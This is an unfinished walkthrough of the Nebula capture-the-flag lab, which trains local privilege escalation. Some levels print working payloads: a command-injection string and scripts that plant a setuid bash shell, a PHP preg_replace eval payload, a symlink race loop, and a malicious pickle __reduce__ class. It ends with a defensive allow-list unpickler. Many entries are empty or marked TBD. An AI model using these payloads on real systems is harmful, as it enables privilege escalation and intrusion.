Exploit-Exercises: Nebula (v5) Walkthrough

Reference: Exploit-Exercises: Nebula (v5), Exploit Education > Nebula
Target IP: 192.168.1.32

Level 00

suid:

Level 01

Hijack echo:

Level 02

Environment variable USER:

Level 03

Add a script /home/flag03/writable.d/test.sh:

Wait for cron:

You cannot put the setuid copy in /tmp, because that filesystem is mounted nosuid:

Level 04

Try to rename the original file:

Level 05

/home/flag05/.backup/backup-19072011.tgz:

Login as user flag05:

Level 06

/etc/passwd:

Level 07

Command injection through the host parameter:

payload

```
127.0.0.1;cp /bin/bash /home/flag07/bash;chmod u+s /home/flag07/bash;echo 1
```

Level 08

/home/flag08/capture.pcap:

The 0x7f bytes in the captured keystrokes are DEL (backspace), so each one removes the character typed before it.

Level 09

preg_replace with the /e (eval) modifier:

vuln

```php
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
```

payload

```php
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"${${system($use_me)}}\")", $contents);
```

Level 10

Race the program so that its access() check sees a file owned by user level10, while the later open() follows the symlink to the token owned by user flag10 (a TOCTOU race between the two calls):

/tmp/test.sh

```bash
#!/bin/bash

# Keep swapping the symlink between a file level10 owns and the token,
# so access() and open() can end up looking at different targets.
while [[ 1 -eq 1 ]]; do
    ln -svnf /tmp/test /tmp/1
    ln -svnf /home/flag10/token /tmp/1 &
    /home/flag10/flag10 /tmp/1 192.168.1.89
    sleep 1
done
```

Level 11

TBD

Level 12

TBD

Level 13

Use LD_PRELOAD to replace the original getuid().
But LD_PRELOAD is ignored by the dynamic loader for setuid programs.

Level 14

```python
import sys

# The level 14 program shifts each character by its position in the string;
# subtract the index again to recover the original token.
result = []
for i, ch in enumerate(sys.argv[1]):
    result.append(chr(ord(ch) - i))

print("".join(result).strip())
```

Level 15

TBD

Level 16

Minimal vulnerable code:

/tmp/FLAG16.SH:

```bash
#!/bin/bash

cp /bin/bash /home/flag16/bash
chmod u+s /home/flag16/bash
```

Level 17

pickle

```python
try:
    import cPickle as pickle  # Python 2, as on the Nebula VM
except ImportError:
    import pickle             # Python 3
import os

class payload(object):
    # On unpickling, the callable returned by __reduce__ is invoked with these arguments.
    def __reduce__(self):
        return (os.system, ('cp /bin/bash /home/flag17/bash && chmod u+s /home/flag17/bash',))

with open("flag17.pickle", "wb") as fp:
    pickle.dump(payload(), fp)
```
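Why this works, and how a receiving service can close the hole, as an added example that is not from the original post or the Nebula level: pickle resolves the callable named by __reduce__ through Unpickler.find_class(), so an unpickler that only resolves an allow-list of globals refuses such payloads before anything runs. The "payload" here is a constructed, harmless stand-in (it names os.getcwd instead of os.system).

```python
import io
import os
import pickle

# Allow-list of (module, name) pairs the unpickler may resolve; everything else is refused.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global not on SAFE_GLOBALS.

    A __reduce__-based payload (like the Level 17 one) is a pickle GLOBAL
    opcode for the callable followed by a REDUCE opcode; find_class() is the
    hook where that GLOBAL is resolved, so the refusal happens before the call.
    """

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Harmless(object):
    """Constructed stand-in for the Level 17 payload class: __reduce__ names a
    callable, here os.getcwd rather than os.system, so the demo has no side effects."""

    def __reduce__(self):
        return (os.getcwd, ())


def demo():
    benign = pickle.dumps({"name": "level17", "tags": ["nebula", "pickle"]})
    reduce_payload = pickle.dumps(Harmless())
    results = {}
    results["plain_benign"] = pickle.loads(benign)
    # Plain pickle.loads runs the callable from __reduce__: getcwd returns a str.
    results["plain_reduce_ran"] = isinstance(pickle.loads(reduce_payload), str)
    results["restricted_benign"] = restricted_loads(benign)  # dict/list/str need no globals
    try:
        restricted_loads(reduce_payload)
        results["restricted_reduce_blocked"] = False
    except pickle.UnpicklingError:
        results["restricted_reduce_blocked"] = True
    return results
```

An allow-list unpickler only limits which globals a pickle can name; data from an untrusted source is still better exchanged in a format such as JSON that cannot name code at all.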

Level 18

TBD

Level 19

TBD

I’ll try to complete this post when I’m not so busy.